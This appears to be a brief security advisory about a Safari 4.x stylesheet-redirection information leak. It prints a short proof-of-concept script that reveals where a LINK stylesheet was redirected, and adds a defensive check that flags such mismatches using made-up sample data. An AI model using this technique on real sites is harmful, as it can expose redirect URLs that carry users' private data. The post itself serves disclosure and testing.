Apple Safari Stylesheet Redirection vulnerability

There’s a 0-day vulnerability affecting Safari 4.x users. It’s not critical, but it is important to be aware of it.

<link rel="stylesheet" type="text/css" href="http://www.yahoo.com">
<script language="javascript">
// setTimeout is used just to wait for the page to finish loading
setTimeout("alert(document.styleSheets[0].href)", 10000);
</script>

Listing 01 – Apple Safari Stylesheet Redirection PoC

Cesar Cerrudo discovered this vulnerability and reported that Safari does not return the URL specified in the LINK element's href value; instead, document.styleSheets[0].href gives the target URL that the stylesheet request was redirected to.

A malicious user may take advantage of this vulnerability to steal sensitive information.
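
A regression check for the behaviour described above, as an added example that is not part of the original post or of Cerrudo's report: it compares the URL declared on each LINK element with the href the browser reports for the loaded stylesheet and flags any mismatch. The function names and the sample data are assumptions made up for illustration.

```javascript
// Added example: flags stylesheets whose reported href differs from the
// URL declared on the LINK element (the behaviour the PoC exposes).
// checkSheet / auditStyleSheets are hypothetical names, not a browser API.

// Compare the URL the page asked for with the URL the browser reports.
function checkSheet(declaredHref, reportedHref, baseUrl) {
  if (reportedHref === null || reportedHref === undefined) {
    return { status: "inline", leaked: false }; // <style> blocks have no href
  }
  let declared, reported;
  try {
    declared = new URL(declaredHref, baseUrl); // resolves relative hrefs
    reported = new URL(reportedHref, baseUrl);
  } catch (e) {
    return { status: "unparseable", leaked: false };
  }
  if (declared.href === reported.href) {
    return { status: "match", leaked: false };
  }
  // A differing URL means script can read where the request was redirected.
  const crossOrigin = declared.origin !== reported.origin;
  return {
    status: crossOrigin ? "redirect-exposed-cross-origin" : "redirect-exposed",
    leaked: true,
    declared: declared.href,
    reported: reported.href,
  };
}

// In a browser: auditStyleSheets(document.styleSheets, location.href)
function auditStyleSheets(sheets, baseUrl) {
  return Array.from(sheets)
    .filter((s) => s.ownerNode && s.ownerNode.tagName === "LINK")
    .map((s) => checkSheet(s.ownerNode.getAttribute("href"), s.href, baseUrl))
    .filter((r) => r.leaked);
}

// Constructed sample standing in for document.styleSheets (not real data).
const fakeLink = (href) => ({ tagName: "LINK", getAttribute: () => href });
const SAMPLE_SHEETS = [
  { ownerNode: fakeLink("/site.css"), href: "http://test.example/site.css" },
  { ownerNode: fakeLink("http://a.example/go"), href: "http://b.example/home?user=alice" },
  { ownerNode: { tagName: "STYLE", getAttribute: () => null }, href: null },
];
```

An empty result from auditStyleSheets means the browser reports only the URLs the page itself declared.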

Be cautious when surfing the net!
